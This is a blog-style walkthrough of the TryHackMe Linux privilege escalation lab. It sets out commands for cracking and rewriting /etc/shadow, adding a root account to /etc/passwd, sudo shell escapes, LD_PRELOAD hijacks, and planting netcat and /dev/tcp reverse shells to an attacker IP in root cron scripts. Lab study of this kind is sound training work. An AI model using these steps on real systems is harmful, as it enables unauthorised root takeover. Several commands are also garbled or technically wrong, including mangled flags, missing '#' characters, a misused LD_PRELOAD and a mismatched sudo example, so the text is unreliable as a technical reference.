Linux Privilege Escalation Walkthrough
This walkthrough covers various Linux privilege escalation techniques demonstrated in the TryHackMe “Linux Privilege Escalation” room. Each task presents a different method for gaining elevated privileges, explaining the background, the objectives, and the practical steps involved.
Task 1: Deploy the Vulnerable Debian VM
Before starting, ensure you are connected to the TryHackMe VPN or using the in-browser Kali instance to access the vulnerable Debian VM.
To connect to the VM via SSH:
ssh user@MACHINE_IP -oHostKeyAlgorithms=+ssh-rsaIf prompted for a password, use `password321`. This command specifies the use of the `ssh-rsa` key algorithm due to updates in OpenSSH that may not support older keys by default.
Once logged in, run the `id` command to view the current user’s identity:
idExpected Output:
```
This confirms that the “user” account is a standard, non-root user, setting the stage for various privilege escalation techniques.
Task 2: Service Exploits
Service Exploits?
Service exploits target vulnerabilities in services running on a system, which often run with elevated privileges. Exploiting these can allow attackers to execute commands as a higher-privileged user.
Objective: Exploit vulnerable services running on the machine.
Check for running services that might have known vulnerabilities:
```bash
ps aux
```
If you find a vulnerable service (e.g., an outdated MySQL or Apache server), you can use a known exploit to gain elevated privileges. This usually involves sending malicious input to the service to execute commands as the root user.
— -
Task 3: Weak File Permissions — Readable /etc/shadow
`/etc/shadow`?
The `/etc/shadow` file in Linux stores hashed passwords for user accounts. Only the root user should have read permissions to this file. If non-root users can read it, they can attempt to crack these hashes and gain unauthorized access.
Objective: Exploit weak file permissions allowing non-root users to read the `/etc/shadow` file.
Check if the `/etc/shadow` file is readable:
cat /etc/shadowIf readable, extract the hash for the root user and use a tool like John the Ripper to crack it:
john - wordlist=/usr/share/wordlists/rockyou.txt rootHash.txtOnce the root password is cracked, switch to the root user:
su rootTask 4: Weak File Permissions — Writable /etc/shadow
File Write Permission?
Write permissions allow modifying a file. If a non-root user can write to `/etc/shadow`, they can alter the root password hash, effectively changing the root password to one of their choosing.
Objective: Exploit weak file permissions allowing non-root users to write to the `/etc/shadow` file.
Check if the `/etc/shadow` file is writable:
ls -la /etc/shadowIf writable, generate a new password hash:
openssl passwd -6 -salt xyz newpasswordReplace the root hash in `/etc/shadow` with the new hash, then switch to the root user using the new password:
su rootTask 5: Weak File Permissions — Writable /etc/passwd
`/etc/passwd`?
The `/etc/passwd` file contains user account information, including usernames and user IDs. It should only be writable by the root user. If it is writable by others, they can add or modify user accounts.
Objective: Exploit weak file permissions allowing non-root users to write to the `/etc/passwd` file.
Practical Method:
Check if the `/etc/passwd` file is writable:
ls -la /etc/passwdTo add a new user with root privileges, append a new entry:
echo 'newuser:x:0:0:root:/root:/bin/bash' >> /etc/passwdSwitch to the new user, which has root privileges:
su newuserTask 6: Sudo — Shell Escape Sequences
`sudo`?
`sudo` is a command that allows permitted users to execute a command as the superuser or another user, as specified by the security policy. Some commands can be exploited using shell escape sequences to gain a root shell.
Objective: Exploit shell escape sequences in commands allowed to be run with `sudo` without a password.
List commands allowed to be run with `sudo`:
sudo -lIf commands like `vim`, `less`, or `man` are allowed, escape to a shell:
sudo vim -c ':!/bin/bash'This provides a root shell through `vim` using its command mode.
Task 7: Sudo — Environment Variables
Environment Variables?
Environment variables are dynamic values that affect the processes or programs on a computer. `sudo` can sometimes be exploited by manipulating these variables to execute commands as root.
Objective: Exploit environment variable manipulation with `sudo`.
If a script or command executed with `sudo` is vulnerable to environment variable manipulation, modify the `PATH` variable to include a directory with malicious binaries.
For example, if `env` is allowed:
sudo env /bin/bashThis directly provides a root shell using `env`.
Task 8: Cron Jobs — File Permissions
Cron Jobs?
Cron jobs are scheduled tasks that run at specified intervals on Linux systems. If these jobs run scripts with root privileges and the scripts are writable by non-root users, they can be exploited to escalate privileges.
Objective: Exploit writable scripts executed by cron jobs.
Check `/etc/crontab` for cron jobs and scripts run as root:
cat /etc/crontabIf a script like `/usr/local/bin/overwrite.sh` is writable:
echo 'nc -e /bin/bash YOUR_IP 4444' > /usr/local/bin/overwrite.shStart a Netcat listener on your machine:
nc -lvnp 4444Wait for the cron job to execute and connect back, granting a root shell.
Task 9: Cron Jobs — PATH Environment Variable
PATH Environment Variable?
The PATH environment variable specifies a set of directories where executable programs are located. If a cron job doesn’t specify the full path for an executable, an attacker could place a malicious executable earlier in the PATH.
Objective: Exploit cron jobs that do not specify full paths for executables.
If a cron job executes commands like `service` without specifying the full path, create a malicious `service` script in a directory that is earlier in the PATH.
echo -e '!/bin/bash\nnc -e /bin/bash YOUR_IP 4444' > /tmp/service
chmod +x /tmp/serviceModify the PATH to include `/tmp`:
export PATH=/tmp:$PATHWait for the cron job to run, which will execute your `service` script.
Task 10: Cron Jobs — Wildcards
What are Wildcards?
Wildcards in Linux are characters that can be used to represent multiple characters in file and command names. Improper use of wildcards in scripts can lead to arbitrary command execution.
Objective: Exploit wildcard injection in cron jobs.
If a cron job uses wildcards to process files:
echo 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' > /home/user/ -The ` — ` filename trick can force commands to run unexpectedly. Start a listener and wait for the cron job to execute.
Task 11: SUID / SGID Executables — Known Exploits
SUID / SGID Executables?
SUID (Set Owner User ID upon execution) and SGID (Set Group ID upon execution) executables run with the privileges of the file’s owner or group. If these are misconfigured, they can be exploited to gain elevated privileges.
Objective: Exploit known vulnerabilities in SUID/SGID executables.
Identify SUID binaries:
find / -perm -u=s -type f 2>/dev/nullIf a vulnerable binary is identified (e.g., an old version of `nmap`), use it to gain a root shell:
nmap - interactive
!shTask 12: SUID / SGID Executables — Shared Object Injection
Shared Object Injection?
Shared object injection involves exploiting a program that loads shared libraries at runtime. If a program is running with elevated privileges and can be tricked into loading a malicious library, it can be exploited to escalate privileges.
Objective: Exploit SUID binaries
that can be manipulated to load malicious shared objects.
If a SUID binary like `/usr/local/bin/suid-so` exists:
Create a malicious shared object:
include <stdio.h>
include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
setuid(0); setgid(0);
system("/bin/bash");
}Compile and execute the binary:
gcc -fPIC -shared -o /tmp/hijack.so /tmp/hijack.c -nostartfiles
export LD_PRELOAD=/tmp/hijack.so
/usr/local/bin/suid-soThis drops a root shell.
Task 13: SUID / SGID Executables — Environment Variables
Environment Variables?
Environment variables can affect program behavior. Misconfigured SUID programs can be exploited by manipulating environment variables like `LD_PRELOAD`.
Objective: Exploit SUID executables vulnerable to environment variable manipulation.
Create a shell script and set `LD_PRELOAD`:
echo 'int main() { setuid(0); system("/bin/bash"); }' > /tmp/env.c
gcc -o /tmp/env /tmp/env.c
export LD_PRELOAD=/tmp/envRun a vulnerable SUID program:
/usr/local/bin/suid-envGain root access through the shell.
Task 14 & 15: SUID / SGID Executables — Abusing Shell Features
Shell Features?
Shell features such as command execution (`!`), job control, and environment manipulation can be exploited in scripts run with elevated privileges.
Objective: Exploit shell features in SUID scripts.
If a script runs with SUID privileges and allows interactive mode:
sudo -u root /bin/bash -pThis retains the elevated privileges without dropping to a lower privilege level.
Task 16: Passwords & Keys — History Files
History Files?
History files (`.bash_history`, `.mysql_history`, etc.) store commands executed by users. These files can reveal sensitive information like passwords if improperly secured.
Objective: Exploit sensitive data stored in history files.
Check for history files:
cat ~/.bash_history
cat ~/.mysql_historyIf sensitive commands (like passwords) are found, use them to elevate privileges:
su rootTask 17: Passwords & Keys — Config Files
Config Files?
Config files often store system and application settings, including hard-coded credentials. These files can be exploited if they contain sensitive information and are accessible to non-root users.
Objective: Exploit sensitive information stored in configuration files.
Search for readable configuration files:
grep -r "password" /etc/Use any found credentials to escalate privileges, such as accessing services running as root:
mysql -u root -p Task 18: Passwords & Keys — SSH Keys
SSH Keys?
SSH keys provide secure access to remote servers. If an SSH private key is found, it can be used to log in as the associated user, potentially gaining elevated access.
Objective: Exploit SSH keys left accessible to unauthorized users.
Search for SSH keys:
ls -la ~/.ssh/If a private key (`id_rsa`) is found, use it to access the root account:
ssh -i ~/.ssh/id_rsa root@localhostTask 19: NFS (Network File System)
NFS?
NFS allows file sharing across a network. Misconfigured NFS shares can be exploited by clients to gain elevated privileges on the server, especially if root access is improperly allowed.
Objective: Exploit misconfigured NFS shares to gain elevated privileges.
Check `/etc/exports` for NFS shares:
cat /etc/exportsMount the share and create a file with the SUID bit set:
mount -o rw,vers=2 MACHINE_IP:/ /mnt/nfs
echo 'cp /bin/bash /mnt/nfs/bash; chmod +s /mnt/nfs/bash' > /mnt/nfs/suid.shRun the script and execute the SUID binary to gain root access.
Task 20: Kernel Exploits
Kernel?
The kernel is the core part of the Linux OS that manages hardware, system resources, and security. Kernel exploits target vulnerabilities in the kernel to gain root access.
Objective: Exploit outdated or vulnerable kernel versions.
Check the kernel version:
uname -rSearch for kernel exploits compatible with the version:
searchsploit kernel 4.xDownload, compile, and run the exploit:
gcc exploit.c -o exploit
./exploitGaining root access via kernel vulnerability.
Task 21: Privilege Escalation Scripts
Privilege Escalation Scripts?
Privilege escalation scripts automate the discovery of misconfigurations and vulnerabilities that can be exploited to gain elevated privileges.
Objective: Use automated scripts to identify potential privilege escalation paths.
Download and run `LinPEAS` or `Linux Exploit Suggester`:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.shAnalyze the script output for possible escalation techniques and apply them accordingly.
Conclusion:
This walkthrough provides a comprehensive guide to various Linux privilege escalation techniques. By understanding each method and its implications, users can learn how to both identify and mitigate these vulnerabilities, reinforcing the importance of securing Linux systems against unauthorized access.
Connect with me on LinkedIn: linkedin.com/in/raajeshmenghwar
